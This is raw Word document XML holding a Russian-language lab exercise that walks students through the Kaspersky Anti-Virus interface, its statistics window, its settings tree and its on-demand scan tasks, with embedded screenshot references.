                  <pic:blipFill>
                    <a:blip r:embed="rId231" r:link="rId232">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4114800" cy="28270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jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В главном окне интерфейса обратите внимание, что весь текст в информационной части окна, разбитый серыми рамками на группы, содержит ссылки. Таким образом, в главном окне представлен только небольшой отчет о неком компоненте антивируса, а по нажатию на него выводится окно с подро</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ной информацией.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Убедитесь в этом, щелкнув левой клавишей мыши по группе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Статист</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ка</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03" name="Рисунок 103" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-12.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId233">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jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В результате должно открыться то же окно, что в пункте 10. Убед</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тесь в этом и закройте окно статистики, нажав </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Закрыть</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434840" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104" name="Рисунок 104" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-13.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId231" r:link="rId234">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4434840" cy="30480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jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вернитесь к главному окну интерфейса антивируса и закройте его</w:t>
      </w:r>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70" w:name="_Toc3811362"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание 2. Структура и настройки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>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Это задание посвящено изучению </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Окна настроек</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и на его примере - структуры </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</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Как и любой антивирус для рабочей станции, персональный </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обеспечивает: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проверку в режиме реального времени, то есть "на лету" или пост</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">янную защиту. В терминах </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> это называется одним словом - "</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>". Она в свою очередь делится на защиту файловой системы, почты, проверку просматриваемых веб-страниц и проактивную защиту. Эти элементы называются "компонентами защиты", настраивать и управлять ими можно по отдельности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверку по требованию, в терминах </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - задачи типа "</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск вирусов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Средства обновления антивирусных баз, просмотра статистики и отчетов и пр. - все это объединяется термином "</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис</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задании нужно будет перейти к окну </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и с помощью расп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ложенного в нем дерева настроек изучить структуру антивируса. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте главное окно интерфейса антивируса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579620" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105" name="Рисунок 105" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-14.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId235">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9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдите к окну настроек, нажав ссылку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685800" cy="251460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106" name="Рисунок 106" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-15.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId236" r:link="rId237">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="685800" cy="251460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открывшееся окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> разделено вертикально на две части. Слева - дерево настроек, в котором можно выбирать нужный компонент или группу параметров. В правой части выводятся все настройки, относящиеся к выбранному в левой части (в дереве) пункту. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Как видно из структуры дерева, все настройки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> делятся на три большие группы в соответствии с описанными в начале задания функциями: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск вирусов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервис </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(прочитайте об этих группах в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Справке</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ознакомьтесь с окном Настройка, поочередно переходя по соответств</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ющим пунктам дерева в левой части окна.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4008120" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107" name="Рисунок 107" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-17.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224" r:link="rId238">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9"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдите к группе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск вирусов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это - настройки проверки по требованию, то есть по требованию пользователя. Она используется в случае, если необходимо проверить некий объект или группу объектов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Для запуска проверки по требованию нужно определить две вещи: что проверять и с какими настройками это делать. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет выбрать объекты, которые нужно проверить, двумя путями: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус встраивается в контекстное меню каждого файла, размеще</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ного на жестком диске (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проверить на вирусы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">). В этом случае производится проверка только выделенного объекта или объектов. При этом используются общие настройки, то есть те, которые выводятся при нажатии пункта </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск вирусов</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701540" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108" name="Рисунок 108" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-18.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId239" r:link="rId240">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4701540" cy="34671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Можно заранее определить папку или группу папок или объектов и сформировать отдельную задачу. Тогда для нее можно задать свои собственные настройки и в дальнейшем запускать эту задачу одним нажатием кнопки. По умолчанию </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> создает три такие системные задачи с з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ранее определенным набором проверяемых объектов: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проверку критических областей</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Моего Компьютера</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Объектов автозапуска</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Таким образом, настройки группы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск вирусов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> соответствуют настройкам задачи, запускаемой из контекстного меню различных объектов. При этом она содержит три подгруппы, соответствующие другим задачам пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">верки по требованию с заданным набором проверяемых объектов: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Критические о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ласти</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мой компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Объекты автозапуска</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По мере формирования пользовательских задач проверки по требованию, они будут аналогично добавляться в дерево настроек в группу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск вирусов</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Ознакомьтесь с доступными для настройки параметрами системных задач проверки по требованию, поочередно выделяя пункты </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Критические области</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мой компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
